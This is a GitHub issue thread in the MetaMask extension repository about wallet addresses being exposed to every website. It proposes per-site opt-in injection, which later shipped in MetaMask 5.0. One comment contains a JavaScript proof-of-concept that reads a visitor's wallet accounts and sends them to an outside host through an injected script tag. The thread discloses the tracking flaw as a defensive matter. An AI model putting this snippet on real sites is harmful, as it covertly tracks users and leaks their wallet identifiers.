### ISSUE TITLE
privacy: option to enable injection on per-site basis

### ISSUE THREAD

**Issue by ligi** [MetaMask/metamask-extension#2888]
This issue moves a discussion from twitter to this issue-tracker as I hope here it will be a bit more fruitful. The current behavior is a big problem privacy-wise as @Arachnid pointed out very correctly:

> Right now, a user's Metamask wallet address constitutes a persistent user identifier that survives cache and cookie erasure and even browser reinstalls.

@Arachnid on twitter: https://twitter.com/nicksdjohnson/status/950003999469654016

**Comment by mattdf** [comment]
You really should get on fixing this guys, it's been over 8 months: https://www.reddit.com/r/ethereum/comments/68mv7k/driveby_identification_of_metamask_users/

The space is not so niche anymore that you can get away with ignoring it, as your user numbers grow companies will start using this to track people, and you can't keep using the "developer beta" excuse.

**Comment by tmashuang** [comment]
Related to #537.

**Comment by ligi** [comment]
Thanks @tmashuang - was searching for duplicates - but did not research back to 2016 - still keeping this open to improve visibility - thinking the issue from 2016 is buried to deep ;-)

**Comment by ligi** [comment]
Thinking about this a bit longer - perhaps there is an option to kill 2 birds with one stone here: a site could not only have metamask on/off as state - but also the network. I see myself switching between the different networks for different sites (usually these sites then only work with one network) - so when enabling a site to have web3 injection - metamask could also ask which network (main, rinkeby, ..) to use with this site.

**Comment by tarmo888** [comment]
MetaMask should have opt-in per-site basis. Otherwise, anyone could put this script on their site and start tracking visitors. I think regular users don't need to know about other networks. Once the user trusts site to see address in mainnet, why ask the same question for other networks, which can be also mainnets, just not Infura.

```javascript
if (typeof web3 !== 'undefined' && typeof JSON !== 'undefined') {
	window.web3 = new Web3(web3.currentProvider);
	web3.eth.getAccounts(function(response,accounts) {
		if (accounts.length) {
			var script = document.createElement('script');
			script.src = 'https://example.com/?accounts=' + JSON.stringify(accounts);
			document.head.appendChild(script);
		}
	});
}
```

**Comment by Iruwen** [comment]
This is a privacy nightmare. The world is dicussing supercookies and fingerprinting and MetaMask willingly exposes sensitive data to every host asking for it?

**Comment by bdresser** [comment]
Full discussion on this feature at #714

**Comment by bdresser** [comment]
Log-in per site is implemented in https://github.com/MetaMask/metamask-extension/pull/4703 and released in MetaMask 5.0 as per [EIP 1102](https://github.com/ethereum/EIPs/blob/master/EIPS/eip-1102.md).
